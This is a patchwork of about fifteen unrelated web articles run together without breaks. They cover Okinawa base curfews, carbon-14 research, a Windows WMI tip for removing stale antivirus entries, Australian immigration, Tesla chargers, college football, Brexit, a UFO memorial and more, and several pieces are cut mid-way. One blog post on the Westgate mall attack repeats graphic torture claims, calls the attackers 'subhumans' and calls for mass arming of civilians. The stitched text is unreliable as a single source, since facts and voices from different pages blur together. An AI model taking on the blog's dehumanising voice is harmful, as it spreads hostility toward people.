Okinawa's previous liberty policy, originally imposed Japan-wide in late 2012 before it was eased slightly, allowed troops E-5 and below to stay out as late at 1 a.m., although all personnel, regardless of rank, were banned from drinking in public off base between midnight and 5 a.m.
“My intention is for all SOFA status personnel to consider their roles as ambassadors to Japan and good neighbors with the people of Okinawa, as reflected in their personal conduct during the period of mourning,” III MEF commander Lt. Gen. Lawrence Nicholson, who is expected to address a news conference Saturday, was quoted as saying in the statement.
“Additionally, we honor and mourn the tragedies affecting the victims of two heinous crimes. These incidents do not accurately represent the behavior of the more than 50,000 SOFA status personnel living in Okinawa who lawfully, peacefully and positively engage with our Okinawan neighbors on a daily basis.”
Gadson, who goes by his Japanese wife's family name of Shinzato, reportedly told police he attacked Shimabukuro from behind with a stick while she was out for an evening walk before strangling her.
He has been charged with illegally disposing of her body, although other charges are possible.
Okinawa is home to more than half of the American troops stationed in Japan, and the recently elected prefectural governor ran on an anti-base platform that, along with the recent crimes, has fueled a vocal protest movement. There are plans to move a number of those forces to Guam, but the date has been repeatedly postponed.
A protest was held Wednesday in front of Kadena's main gate to condemn the slaying and call for a smaller military footprint, revision of the SOFA and cancellation of a plan to build a new military runway at Henoko.
Approximately 2,000 people attended a rally Sunday in front of the main gate of Marine Corps headquarters on Camp Foster, and a mass Okinawa-wide rally is scheduled for June 19.
kidd.aaron@stripes.com
Twitter: @kiddaaron
This promotional film, produced by the Dallas Firefighters Training School, features prominent Dallas landmarks, including the John Neely Bryan cabin and Historic District, the Magnolia Building, Market Hall, views of the skyline, and aerial footage. Also included are scenes of Dallas fire stations and firefighters on the job.
The Dallas Firefighter's Museum's film collection captures a variety of activities performed by the Dallas Firefighters. While a few films focus on fire fighting and training, most feature community events such as the fair, toy repair, pump races, and even a Miss Flame pageant. The Dallas Firefighter's Museum is housed in one of the city's oldest fire stations; the building served as a working fire station from the time it was built in 1907 until 1975, when the museum took over. The museum aims to preserve the rich history of the Dallas Fire Department through exhibits and educational experiences. Visit their Website at http://www.dallasfiremuseum.com.
Lawrence Livermore National Laboratory researchers have measured the carbon-14 isotope (14C) produced by cosmic rays in the stratosphere and found its production rate is less than most previous estimates.
The team, led by Kristie Boering of the University of California, Berkeley and including Lawrence Livermore National Laboratory scientists, measured the 14C content of carbon dioxide in air collected by high-altitude balloon flights in 2003, 2004 and 2005, and estimated the contemporary 14C production in the stratosphere, nearly four decades after the Limited Test Ban Treaty restricted atmospheric testing of nuclear weapons.
Atmospheric testing of nuclear weapons in the 1950s and ‘60s injected massive amounts of 14C into the stratosphere. The amount of weapon 14C at that time was so large that it effectively hid the natural production of 14C by cosmic rays. Now that the weapon 14C has mostly dissipated from the atmosphere, the new measurements enabled the team to estimate the natural 14C source and found it was much lower than most previous estimates. The research appears in a recent edition of the journal Geophysical Research Letters.
“Our estimates are the first that use recent measurements of 14C concentration in the stratosphere to estimate the natural 14C production rate,” said LLNL scientist Philip Cameron- Smith, a co-author on the paper. “We confirmed our analysis by simulating 14C with the LLNL atmospheric chemistry-transport model (IMPACT) on the Livermore Computing supercomputers.”
Only one other set of measurements of stratospheric 14C has been made since the atmospheric circulation purged the stratosphere of the large amounts of 14C originally deposited there by nuclear weapons testing. Moreover, no other stratospheric 14C datasets have included simultaneous measurements of other long-lived tracers, which were a crucial part of this analysis.
“This has implications for estimates of the cycling of carbon between the atmosphere, plants, soils and the ocean, which often rely on 14C,” Cameron-Smith said.
Scientists believe that supernova remnants (like Cassiopeia A, the youngest known supernova remnant in the Milky Way) produce cosmic rays. An LLNL team found that carbon 14 production by cosmic rays in the stratosphere is less than previous estimates. Image courtesy of NASA.
Carbon-14 is produced in the stratosphere by nuclear reactions of atmospheric nitrogen with thermal neutrons produced naturally by cosmic rays (with the highest production rate 10 to 13 miles above Earth's poles), as well as by atmospheric nuclear weapons testing in the 1950s and ‘60s. The 14C atoms are then rapidly oxidized, first to carbon monoxide (CO) and then carbon dioxide (CO 2 ), an inert gas that circulates throughout the stratosphere and troposphere.
At Earth's surface 14CO 2 (an isotope of CO 2) can enter the oceanic and terrestrial carbon reservoirs. Because its production and redistribution in the Earth system are unlike any other gas, 14CO 2 is a unique biogeochemical and fossil fuel tracer.
“The 14C production rate and transport to the troposphere are necessary for carbon cycle studies,” according to Amadu Kanu, a Lawrence Scholar and an author of the paper. “This work will improve our understanding of the carbon cycle on Earth, including distinguishing the effects of natural processes from fossil fuel burning and how quickly atmospheric carbon flows in and out of the biosphere, water and soil.”
“Measurements of 14C also have the potential to yield new insight into the stratospheric circulation,” according to Boering, “since it is independent of chemistry occurring there, and unlike most other tracers it is produced in the stratosphere independent of other chemicals.”
Other Livermore authors include Tom Guilderson and Dan Bergmann. UC Berkeley and University of Miami researchers also contributed to this work.
I'm sure you've seen the following warning before:
But have you ever wondered where the Windows Security Center gets its info? (BTW, Microsoft renamed it Windows Action Center in Windows 7).
It gets the information from the Windows Management Instrumentation interface, and more precisely, the WMI name spaces \root\SecurityCenter and \root\SecurityCenter2. I wrote a small script to display this info:
You can download the script here.
It's also possible to modify this WMI information. Say you've uninstalled an antivirus program, but that it still shows up in the Windows Security Center. Then you can delete the WMI information with utility wbemtest.exe.
Start wbemtest (if you're on Windows Vista or 7, you need to elevate wbemtest) and click on connect.
Type the name space you want to change: \root\SecurityCenter or \root\SecurityCenter2 (SecurityCenter2 is a recent addition). And then connect.
Click onEnum Classes…
Then click OK
Then double-click the type of information you want to change. Here we change AntiVirusProduct:
Then click Instances
And now you can change the information. Here we delete it:
A vicious temporal war grips the planet Aoris – can the Doctor save both the past and future from each other? The Fourth Doctor Adventures continue...
Our fifth series of brand-new audios starring Tom Baker, Lalla Ward and John Leeson continues today with Doctor Who: Legacy of Death; where the battles on the planet Aoris take a turn for the worse after the events of Doctor Who: The Paradox Planet. Listen to the trailer below:
The Doctor, Romana and K9 have found themselves trapped in a temporal war. On Aoris, the past battles the future - and the future fights back!
With both sides of the war now capable of time travel, the conflict is about to enter a deadly stage. As the pieces of history lock into place, there is little the Doctor can do. With more Time Tanks moving into combat, the endgame is approaching. The people of Aoris risk extinction at their own hand.
Can even the Doctor save the same planet twice in the same day?
Written by Jonathan Morris and starring Tom Baker, Lalla Ward, John Leeson, Simon Rouse, Tom Chadbon, Paul Panting, Emma Campbell-Jones, Laura Rees, Bryan Pilkington and Jane Slavin, Doctor Who – The Fourth Doctor Adventures: Legacy of Death is available to buy and download now.
Don't forget that as with the majority of Big Finish releases, CD orders for this title also give access to a complimentary digital copy of the release: so you don't have to wait to enjoy the story!
You can subscribe to the whole of the Fourth Doctor Series Five today to enjoy additional savings, with 2017's Series Six also available to pre-order.
The adventures continue in May with the release of Doctor Who: Gallery of Ghouls, featuring Celia Imrie as Madame Tissot.
Four previous series of Fourth Doctor Adventures are still available to order now, with money-saving special bundles also available. Check out the entire range on our Fourth Doctor Collected page.
ENTREPRENEUR Dick Smith says it is “not accidental” that immigration skyrocketed by 27 per cent last year, accusing Australian politicians of cooking the books to keep economic growth figures artificially high.
The latest figures from the Australian Bureau of Statistics show net overseas migration for the year ending 30 June 2017 was 245,000, with New South Wales and Victoria recording their highest ever levels.
NSW added 98,600 migrants, while Victoria added 86,900 — an increase on the previous year of 31 per cent and 23 per cent respectively. “This growth has seen both states surpass their previous recorded high in 2008-09,” ABS demography director Beidar Cho said.
Australia is now the fastest growing country in the OECD. With the country adding a new overseas migrant at a rate of one every two minutes and 20 seconds, the population is set to hit 25 million within months.
“It's just an absolute disaster for our children and grandchildren,” said Mr Smith, an outspoken critic of Australia's high immigration rate who has repeatedly called for Australia's political parties to have a “population plan”.
“It will destroy Australia as we know it today. We're going to end up like the US where you have something like 50 million people on the dole who will never have a job,” he said. ‘It's just complete madness. With automation and robotics there will be fewer meaningful jobs, we'll end up just being a nation selling coffee to each other.”
While mass immigration boosts the overall GDP figure and makes politicians “look as if they are doing well”, we “don't have growth per capita”. “There's no doubt, it's not accidental,” Mr Smith said.
“We're in complete control of our immigration rate. With an economic system that requires perpetual growth, this is the way of getting it. The only other way is hard work, getting better productivity.”
Mr Smith said while the Liberals were scared of property developers like Meriton's Harry Triguboff, Labor refused to discuss immigration for fear of offending the ethnic community.
“That's ridiculous,” he said. “The ethnic people who come here don't want Australia destroyed. They want their children to have jobs. Borders are for self-interest — we should be thinking of our own children and grandchildren.”
He argued eight out of 10 Australians supported a population plan. “What I'm amazed at is there's no discussion,” Mr Smith said. “I get stopped in the street all the time, people say: ‘Dick, it's terrible, 14 per cent youth unemployment, my grandkid can't get a job.'
“It's going to get worse. We've just had two years talking about gay marriage, which is an important human rights issue, but there's no one talking about our biggest threat and that is so many people who won't be able to get proper jobs, you'll end up with gated communities and revolution.”
Leith van Onselen, chief economist with Macrobusiness, said successive governments were running mass immigration programs to keep growth artificially high and as “defacto housing support” to keep the housing bubbles in NSW and Victoria alive.
“Sydney and Melbourne combined added just over 185,000 migrants in one year,” he said. “Three-quarters of Australia's immigration intake going into two biggest, most overcrowded and unaffordable cities is not a good thing.”
Sydney in particular is facing a “bizarre situation” where residents are being displaced by new migrants. “Residents are leaving at quite a fast rate and the birthrate has actually fallen quite significantly,” Mr Onselen said.
“NSW added almost 100,000 migrants, but 14,000 residents left in the year and also the natural increase has fallen quite sharply. All these extra people are forcing people out and making it more expensive to have kids.
“It's a pretty socially regressive situation where young people are forced to move from where they grew up and where all their family and friends are, just because the government wants to run a Big Australia policy.”
Dr Jane O'Sullivan, honorary senior research fellow at the University of Queensland's School of Agriculture and Food Sciences, said Australia was effectively “running to stand still” to keep pace with the infrastructure needed to accommodate new arrivals.
“It costs more than $100,000 in public money per person that we add to our population,” she said. Dr O'Sullivan said the figure was derived by looking at the gross fixed capital formation figures and household expenditure data.
“What we spend on durables is partly replacing the things which reach the end of their lifespan, and partly expanding our stock of those things to keep pace with population growth,” she said.
“So you can separate those parts to come up with the figure for how much we actually spend on expanding everything we need to support our lifestyle. It turns out as a society, it's around 6.5 per cent to 7 per cent of GDP per 1 per cent of population growth.
“So if we're growing at 1.6 per cent, we're spending more than 10 per cent of GDP just running in order to stand still, not improving the level of service we're able to provide people, simply keeping up with the number of hospital beds and school classes to keep things at a level standard.
“To a large extent we are not keeping pace, we're actually falling behind, so the quality of life people are enjoying is going backwards.”
Dr O'Sullivan said the “usual rejoinder” was that governments had failed to spend adequately on infrastructure, but the numbers didn't bear that out.
“They have more than increased their spending in proportion to population growth, it's just becoming increasingly expensive as our megacities cities become bigger and denser,” she said.
“The cost of every extra person becomes more expensive because suddenly you have to build road tunnels, high-rises, refit increased sewerage capacity.
“People think Australia has a small population, but our cities are huge by developed country standards. They're way past economies of scale, to [arguably] diseconomies of scale.”
frank.chung@news.com.au
Tesla already unveiled several new plans for its Supercharger network this year, but now CEO Elon Musk mentioned new routes coming next year that could link Canada to the US and all the way to Central America.
The automaker just now reached 900 Supercharger stations with 6,000 Supercharger stalls and its goal is to have 10,000 Superchargers worldwide by the end of the year.
They have already released the expected locations of their new stations planned for the end of the year and they are mostly aimed at supporting the expected increased demand on the Supercharger network due to the Model 3.
But now Musk revealed on Twitter that they are also planning other routes for next year that are not all on the map just yet.
Sorry! Coming next year, along with completing the Trans-Canada Highway and interconnecting US, Mexico and Central America. — Elon Musk (@elonmusk) August 27, 2017
North Dakota is on the map though and now it looks like it's pushed to next year.
But completing the Trans-Canada Highway and linking the US and Mexico to Central America appear to be new Supercharger routes for Tesla.
Tesla had yet to venture into the less populated areas of Canada, like northern Ontario, Manitoba, and Saskatchewan.
If they add Supercharger stations to those regions on the Trans-Canada Highway, they would link most of the country together. Only a few more stations in The Maritimes and the country would be cover coast-to-coast.
Then by completing the Supercharger network in Mexico, a Tesla owner could technically drive from almost anywhere in the populated Canada and US, all the way down to Central America – for free if they are on the free Supercharging program.
Of course, it's far from a done deal.
Tesla still has a long way to go in order to get to 10,000 Superchargers by the end of the year. For context, that's more Supercharger deployment over 6 months than Tesla did over the first 3 years of the Supercharger network.
Then they want to have 18,000 Superchargers by the end of next year with those new routes. It will be interesting to follow the progress.
Let us know what you think in the comment section below and if there are other routes you want to see Tesla cover.
Soldiers taking control of what is left of Nairobi's Westgate Mall have found that al Shabab's terror attack was more horrifying than previously known. The Daily Mail has the appalling story:
Soldiers told of the horrific torture meted out by terrorists in the Nairobi mall massacre yesterday with claims hostages were dismembered, had their eyes gouged out and were left hanging from hooks in the ceiling. Men were said to have been castrated and had fingers removed with pliers before being blinded and hanged. Children were found dead in the food court fridges with knives still embedded in their bodies, it was claimed. … The horrifying details came yesterday as the first pictures emerged from within the wreckage of the building, showing piles of bodies left strewn across the floor. Yesterday, soldiers and doctors who were among the first people into the mall after it was reclaimed on Tuesday, spoke of the horrifying scenes inside. “You find people with hooks hanging from the roof,” said one Kenyan doctor, who asked not to be named. “They removed eyes, ears, nose. They get your hand and sharpen it like a pencil then they tell you to write your name with the blood. “They drive knives inside a child's body. “Actually if you look at all the bodies, unless those that were escaping, fingers are cut by pliers, the noses are ripped by pliers. Here it was pain.” A soldier, who took pictures at a bread counter and at the ArtCaffe, said he was so traumatised by what he saw he has had to seek counselling. … The collapse happened on Monday when government troops launched a massive assault on the mall where up to 150 people are thought to have been killed. During the firefight, hostages reportedly had their throats slashed from ear to ear and were thrown screaming from third-floor balconies as the siege came to a bloody end. Forensics teams, still sifting through the mountains of rubble, fear many more bodies are yet to be found. Shell-shocked Kenyan troops said the inside of the Israeli-run mall resembled a “scene from a horror movie” with blood spattered everywhere and dead bodies strewn across the floor.
Reportedly, ten of the terrorists have been captured. It seems odd that subhumans like these, having perpetrated such acts, would allow themselves to be taken alive, but that evidently is the case. Death is, obviously, too kind a fate for them.
But what of root causes? The terrorists reportedly were an international group, with Islam the only common denominator.
What lessons can be learned for the future? I would suggest three. First, al Shabab should be destroyed. It would make sense for an international force to invade Somalia and hunt down all members of that group. Second, with hindsight, Kenyan authorities waited too long to take definitive action to kill the terrorists. They allowed the siege to stretch out over four days. That may have made sense on the assumption that they were dealing with a “normal” hostage situation, but in the future, terrorists should not be allowed to work their evil deeds for so long. Third, far more civilians need to be armed. The Nairobi attack was carried out, authorities say, by only around 15 terrorists. There were hundreds of innocent people in the mall at that time. Unfortunately, hardly any of them were armed. If only 100 of the shoppers had been carrying firearms, the terrorists–notwithstanding their heavier weaponry, including hand grenades–likely could have been stopped, or at least kept at bay until soldiers arrived.
Stephen Hunter wrote a book called Soft Target, in which 12 Somali Muslims launch a terrorist attack against the Mall of America in Bloomington, Minnesota. There are chilling similarities between Hunter's fictional attack and what happened at the Westgate Mall. If Muslim terrorists are shifting their attention toward soft targets like shopping malls, as some observers suggest, we could well see similar attacks here in the U.S. Increased security, such as has been put into effect at the Mall of America, is probably appropriate, but realistically, there are so many possible soft targets that they can't all be secured. To the extent there is any solution, it rests with armed citizens. If just one-quarter of all adult Americans regularly carried firearms, including long guns like the AR-15, a terrorist attack like the one in Nairobi would be a death trap for the terrorists.
Will that happen here? Not yet. But if an act comparable to the Westgate Mall massacre takes place on American soil, a massive arming of American citizens will be both necessary and inevitable.
CLOSE Detroit News columnists Bob Wojnowski and John Niyo, with beat writers Angelique Chengelis, Matt Charboneau and sportswriter Dave Goricki, break down last week's games and what's coming next. With an appearance by CMU coach John Bonamego.
Jim Harbaugh (Photo: David Guralnick, Detroit News)
In case you missed it, there's growing evidence to suggest Michigan football is back. The coach is square-jawed and revered, the fans are whispering “Heisman” at their fancy September dinner parties, and the players are wearing adult-sized shoulder pads again.
All is becoming right in the college football world, if the college football world only existed within a 25-mile radius of Ann Arbor. Everyone else in the college football world — the free world, actually — finds it thoroughly obnoxious.
But before the return can be deemed official, there's one small piece of housekeeping left: Michigan still must prove it can slug with the Big Ten's traditional blubber-butts. You know, hulking teams like Michigan State and Ohio State. And yes, Wisconsin.
The Badgers will be in the Big House on Saturday, bloated from all the free treats they received in East Lansing. The Spartans did the Wolverines no favors, naturally. Rather than soften up the Badgers, they buttered them up and let them leave town thinking they're actually, possibly, perhaps sort of fairly good.
I'm not saying Michigan State's defense let down in that 30-6 loss. I'm just saying Mark dantonio will have to earn his capital D back. And frankly, we here at Snarky Column Central are part of the problem. We've been saying very nice things about the Spartans since they beat the Irish, pretending they didn't lose most of their best players, even foolishly suggesting all they had to do to replace Connor Cook was find another quarterback with “Connor” in his name and call him a captain.
Our bad. We chipped away at the Spartans' chip supply in their Warehouse of Disrespect and made them feel comfy. According to my imaginary sources, dantonio was furious the Spartans weren't considered underdogs. As a favor, I'll remedy the situation and lob some doozies.
For instance, did you know Michigan State has lost two of its past four games by a combined score of 68-6? (Spartans: “Grrrr.”) Did you know Michigan State hasn't beaten a legitimate FBS opponent all season, barely slipping past Furman and Notre Ame, also missing its D? (Spartans: “GRRrrrrr.”) Did you know respected media people (they do exist) think Indiana might beat Michigan State on Saturday night down in the hotbed of Bloomington? (Spartans: “You've gone too %$#@* far!”)
At least there will be a big game in Ann Arbor, where the Old Blues have dug out their dusty cardigans and wear them proudly again in the stadium suites, while griping about the tartness of the Pinot Noir. Nostalgia is flowing for this top-10 showdown, although it's actually nothing new for the Badgers.
No. 8 Wisconsin already has beaten two top-10 teams this season — LSU and Michigan State. No. 4 Michigan hasn't topped a top-10 team since edging Wisconsin in 2008. Inexplicably, it has come to this — Jim Harbaugh is trying to do something only Rich Rodriguez has done in nearly a decade. It'd be a significant step, even bigger than when Harbaugh banned seltzer water from Schembechler Hall and implemented forced consumption of whole milk with extra lactose.
If that's an attempt to beat the visitors at their own gut-clogging game, the Badgers aren't easily frightened, and I doubt they'll be dropping cheese curds all over the field Saturday. But the Wolverines will take their shots at young quarterback Alex Hornibrook. I don't know if the Spartans were unaware he was a freshman, or if they just spent every team meeting giggling at his name, but they had no idea how to stop him.
Michigan will have an idea thanks to defensive coordinator Don Brown, aka Dr. Blitz, who holds a Ph.D. in Blitzology with a minor in Mustache Management. He'll harass Hornibrook with all sorts of heavy blitzes, which is different than the Spartans' strategy of enticing him with all sorts of heavy blintzes.
It's also an intriguing coaching matchup between Harbaugh and Paul Chryst, which is sure to confuse rapturous Michigan believers. Harbaugh vs. Chryst? Isn't that the same as Harbaugh vs. Harbaugh?
No sacrilege here. Just an old-fashioned measuring-stick game between bruising squads evenly matched in all the key statistical categories — rushing defense, waist size, cholesterol level. Actually, the Badgers numbers might have spiked after heading straight from East Lansing to Frankenmuth last week and loading up on sausages, sauerkraut and exotic mustards, or so I heard. Someone will be especially hungry Saturday. I think we know who.
The picks
Wisconsin at Michigan: The Wolverines have scored 40-plus points four straight games and are threatening to be as prolific as Fielding Yost's “Point a Minute” teams. It's a vast improvement over some of Michigan's recent “Punt a Minute” teams. Multi-dimensional Jabrill Peppers is expected to further his Heisman candidacy by adding the following duties: Drum major, side judge and guy who holds Harbaugh's headphone cord. Also, he might try place-kicking and long-snapping (on the same field-goal attempt!). Michigan 31-13
Michigan State at Indiana: If I say anything remotely positive about the Spartans, dantonio will be furious. So let's talk about the trophy for this game, the Old Brass Spittoon. Why a drool receptacle? What, the Old Wooden Toilet Seat wasn't available? The Spartans D (or d) better be ready for the pass-happy Hoosiers, because they need to get their capital back. Michigan State 38-31
Rutgers at Ohio State: Urban Meyer rarely shows mercy, and I doubt he will against his former assistant Chris Ash, who took over a Rutgers program desperately in need of an identity. Ash has been trying to pluck pieces of Michigan's recruiting identity and is considering a previously used tactic — closing all the bridges into New Jersey. Meyer will be prepared for a battle, and I strongly suspect he'll kick Ash. Ohio State 45-13
Western Michigan at Central Michigan: It's a showdown between the second- and third-best teams in the state. (Tell me when to lay off, Spartans.) After rolling past two Big Ten teams, the Broncos finally hit the challenging part of their schedule, and it should be quite the party. It's such a big event in Mount Pleasant, I heard the National Guard was trucking in emergency supplies of Pabst Blue Ribbon. Western Michigan 44-38
Louisville at Clemson: A top-five clash with major playoff and award implications. Cardinals quarterback Lamar Jackson has posted incredible numbers and is the early Heisman favorite, although Wolverines fans sniff that he hasn't even returned a punt for a touchdown yet. Good point! Clemson 35-28
bob.wojnowski@detroitnews.com
twitter.com/bobwojnowski
Here is an idea for the film lovers; starting today (11 September) there will be free screenings of films at the Scoop at More London every week from Wednesday to Friday until the 27th of September.
This year the films to be screened include recent blockbusters like Skyfall and Les Misérables as well as classics like Hitchcock's The Birds and Sergio Leone's The Good, the Bad and the Ugly.
The films will be screened alfresco at the amphitheatre next to the City Hall (2A More London Riverside, London, SE1 2DB) so depending on the weather be well prepared and take warm clothes with you.
If we judge from previous years, most of the screenings are very popular (depending on the film and the weather) so we recommend you arrive at the amphitheatre an hour earlier if you want to secure a good seat. As you are aloud to bring food you can combine the screening with a sort of picnic.
Have also in mind that the idea is that you sit and watch the film on a concrete (cement) flat surface so if you think you will feel uncomfortable bring with you a cushion.
All screenings start at 7.30pm. Here is the full schedule:
September, 11 (Wednesday): Skyfall the latest Bond film (2012, with Daniel Craig and Judi Dench). Watch a trailer of the film here
(Wednesday): the latest Bond film (2012, with Daniel Craig and Judi Dench). Watch a trailer of the film here September, 12 (Thursday): Crouching Tiger, Hidden Dragon (2000, directed by Ang Lee).
(Thursday): (2000, directed by Ang Lee). September, 13 (Friday): Frankenweenie stop motion animated film (2012, directed by Tim Burton). Watch a trailer of the film here
September, 18 (Wednesday): Back to the Future (1985, directed by Robert Zemeckis)
(Wednesday): (1985, directed by Robert Zemeckis) September, 19 (Thursday): The Good, the Bad and the Ugly (1966, directed by Sergio Leone; with Clint Eastwood). Watch a trailer of the film here
(Thursday): (1966, directed by Sergio Leone; with Clint Eastwood). Watch a trailer of the film here September, 20 (Friday): Les Misérables musical film (2012, with Russell Crowe)
September, 25 (Wednesday): Amour French film (2012, with Jean-Louis Trintignant)
(Wednesday): French film (2012, with Jean-Louis Trintignant) September, 26 (Thursday): The Birds thriller film (1963, directed by Alfred Hitchcock). Watch a trailer of the film here
(Thursday): thriller film (1963, directed by Alfred Hitchcock). Watch a trailer of the film here September, 27 (Friday): Grease musical film (1978, starring John Travolta and Olivia Newton-John)
To get the full list of events and all their details in order to make plans for any future dates please scroll down to the calendar and click on the event(s) you are interested in.
Image copyright EPA Image caption Ms Sturgeon was addressing the Institute of Directors at the Royal Albert Hall in London
Nicola Sturgeon has linked the Brexit vote to the UK government's austerity policies.
The Scottish first minister also said remaining a member of the single market after Brexit "will be crucial".
And she argued that the UK-wide result of the EU referendum was not a mandate for a hard Brexit.
Ms Sturgeon was addressing the annual conference of the Institute of Directors at the Royal Albert Hall in London.
Prime Minister Theresa May has predicted that the UK will make a success of Brexit, and that Scotland's status would be enhanced as a result of leaving the EU.
But Ms Sturgeon, the SNP leader, told the conference that continued membership of the European single market ‎was the "obvious consensus position" among Leave and Remain voters in the EU referendum.
'Reasonable doubts'
But she acknowledged that certain aspects of single market membership, such as freedom of movement, "will not satisfy everyone".
She also argued that inequality was a key reason behind the EU referendum result, and that the UK government "can no longer ignore the social and economic cost" of austerity.
Ms Sturgeon said: "There are many, many causes of the vote to leave the EU. For many people, they will have included entirely reasonable doubts and reservations about the EU. It is, after all, an imperfect organisation.
"But in part, Brexit was a product of a sense of disenfranchisement and disillusionment. It was borne of inequality, of feelings of powerlessness - of austerity budgets which hurt the public services and social safety nets that so many people depend on.
"And so one consequence of the referendum must be a new effort - which needs to be given real substance in the UK government's autumn statement - to ensure that the benefits of growth, of globalisation, are more fairly distributed."
Ms Sturgeon said she was "very proud of the fact that Scotland voted so strongly to remain in the European Union", but that should, could not ignore the fact that a million Scottish voters wanted to leave.
Image caption The conference is being held at the Royal Albert Hall in London
She added: "They did not think that the European Union benefited them - they did not see advantages from free trade and free movement."
It was Ms Sturgeon's first major speech to a UK audience since the referendum in June, although she has made numerous statements on the issue at Holyrood.
Ms Sturgeon has told MSPs she is "profoundly concerned" about the implications of the UK leaving the EU, with the early signs "not encouraging".
She has also argued that the "least bad option" of remaining in the single market should be a key objective, hitting out at the "cloak of secrecy" over the UK's current negotiating position.
'New role'
Mrs May meanwhile has said the UK could get a better deal from foreign trade after leaving the EU.
In a column in Holyrood magazine which she later posted in full on Facebook, the prime minister said Brexit represented an "exciting chance to forge a new role in the world".
She said the UK would "make a success" of Brexit, saying: "There should be no doubt: we will get a deal that works for us all."
Mrs May said: "As we strike that deal, we have an exciting chance to forge a new role in the world. Scotland's status will not be diminished by that; it will be enhanced.
"We will go out into the world with the aim of being a leader in global free trade, one that makes the most of our advantages, from the financial expertise of Edinburgh to the shipbuilding prowess of the Clyde and the globally renowned food and drink produce of Scotland's countryside."
Coordinates:
The UFO Memorial in Ängelholm
Location of Ängelholm, Sweden
The UFO-Memorial Ängelholm is a statue dedicated to a supposed UFO landing in Kronoskogen, a suburb of Ängelholm, Sweden. A few other such memorials exist in Europe (other examples include the memorial for the Robert Taylor incident in Livingston in Scotland and the Emilcin UFO memorial in Emilcin, Poland). Dedicated in 1963, it is situated in a forest clearing at Kronoskogen, which had witnessed numerous "large-scale test flights" in that time period.[1] The UFO-Memorial Ängelholm memorialises the landing of a UFO, which is said to have taken place on 18 May 1946 and to have been seen by the Swedish entrepreneur, founder and owner of Cernelle AB, Gösta Carlsson. The memorial consists of a model of the UFO and the landing traces, and is constructed of concrete.
Clas Svahn, chairman of UFO-Sweden, has investigated the case and written a book together with Gösta Carlsson about the incident. According to him there was no convincing evidence that the event ever took place the way Gösta Carlsson described it.[2]
See also [ edit ]
Our Review Overall Rating: User Ratings:
Ever since it was announced back in May that CBS' Person of Interest would be getting an abbreviated season 5, fans have been rattled and wanting some answers. Exactly how many episodes will be in the next season? Will season 5 be the last? And, perhaps the biggest question on viewers' minds — will Sarah Shahi be returning to reprise her role as Shaw?
The cast and Executive Producers made their first appearance today at San Diego Comic-Con since the season 5 announcement, including a panel and press room with Michael Emerson, Jim Caviezel, Kevin Chapman, Amy Acker, and Executive Producers Jonathan Nolan, Greg Plageman, and Denise The.
Fortunately for us, the biggest questions on fans' minds were answered. First, there will be 13 episodes, and neither Nolan nor Plageman could say whether this would be the final season because frankly, they don't know. However, because they don't know, they have to go into season 5 under the assumption that it *will* be the final season, so as to give fans a satisfying ending to the series if that unfortunate event were to occur.
And, now for the big question — will there be a Root and Shaw reunion? Denise The said that she “doesn't see how there wouldn't be,” which was a strong hint that the answer was “yes,” but it wasn't definite. But, then, Greg Plageman arrived and finally did confirm that Sarah Shahi will be returning for season 5. No details on exactly when her big return will be or for how many episodes, but the answer is “yes,” and I'm sure fans will be thrilled with that answer alone.
On the downside, no one could really provide any specifics regarding storylines, etc. for the new season because they haven't begun filming yet. The writers are back to work, but production hasn't officially begun. Because of that, it is almost certain that the series won't be returning until sometime in 2016.
Check out the below video interviews to get the full details on what to expect going into season 5.
VIDEO
Executive Producer Jonathan Nolan, and series stars Michael Emerson and Jim Caviezel:
Executive Producer Denise The and Amy Acker:
PHOTOS
All photos courtesy of TV Geek Talk
About Author
Mary Powers Geeky computer and math nerd by day and TV fanatic by night. My beats are The Walking Dead, The Strain, Person of Interest, Z Nation, and anything that most people would call freaky. Editor-In-Chief and Lead Writer of TVGeekTalk.com
Related News
Two-time derby champion Prince Fielder and 2010 winner Robinson Cano will attempt to replicate their past success when they battle in the 2013 MLB Home Run Derby on Monday at Citi Field.
Fielder and Cano represent the American League, along with MLB home run leader Chris Davis and second-year power hitter Yoenis Cespedes. They'll take on a National League squad headlined by Mets star third baseman David Wright. In addition to Wright, the NL squad includes first-time participants Bryce Harper, Michael Cuddyer and Pedro Alvarez. Alvarez was selected as the replacement for Carlos Gonzalez, who withdrew from the contest due to injury.
Fielder bested a field which included Jose Bautista, Mark Trumbo, Carlos Beltran and others a year ago in Kansas City. Fielder also won the derby in 2009 while with the Milwaukee Brewers.
The event will be televised live on ESPN at 8 p.m. ET and is available online through the WatchESPN app and WatchESPN.com.
More from SB Nation:
• MLB trade rumors: Tigers want Tim Lincecum
• Tim Lincecum throws a no-hitter | Pictures
• Yankees trade rumors: Phil Hughes drawing interest
• Matt Garza trade rumor explosion!
• Longread: Brooklyn's field of broken dreams
The completion of the 2015 NFL season was made official last Sunday after the Broncos defeated the Panthers in Super Bowl 50. Every NFL team now has the 2015 season in their rearview mirror and are focusing on 2016 while preparing for NFL free agency and the draft. So what better time to take a quick peek back to examine how each team faired in last year's draft. To see which rookie selection made the most impact, who surprised, and who needs to turn it up next year.
This by no means am I casting judgement on the 2015 draft class, as I operate with the belief that it takes three full seasons to honestly grade a draft. Instead this is just a quick review of what each team received from this year's crop of rookies.
Here is a review of the AFC East Division:
Buffalo Bills
Biggest Impact – Ronald Darby, Cornerback – Florida State (2nd rd pick #50 Overall)
With the Bills not having a first round pick heading into the draft they had to make sure their second round pick would be someone who could come in and contribute immediately. They accomplished just that with the selection of Darby from Florida State. The rookie corner started 15 games registering 68 tackles, 2 interceptions, and 21 passes defensed which was 5th highest in the league. Darby allowed only four touchdowns all season and was tabbed as the Defensive Rookie of the Year by ProFootballFocus. Darby teamed with Stephon Gilmore, and Leodis McKelvin give the Bills a nice compliment of corners heading into next season.
Surprise Impact – Karlos Williams, Running Back – Florida State (5th rd pick #155 Overall)
Coming into the 2015 season if we had predicted that a Bills running back would be tied for the overall team lead with nine touchdowns (7 rushing, 2 receiving) and his name was not LeSean McCoy most of you would have scoffed. That's exactly what running back Karlos Williams did in his first season in Buffalo. Williams proved to be a terrific compliment to McCoy rushing for 517 yards averaging 5.6 yards a carry. Williams started three games for the Bills while McCoy sat due to various injuries. Williams also scored a touchdown in the first six games he saw action in, which tied a record set back in 1998 by former New England running back Robert Edwards. Williams and Edwards were the only two players to ever accomplish this feat.
Least Impact – Nick O'Leary, Tight End – Florida State (6th rd pick #194 Overall)
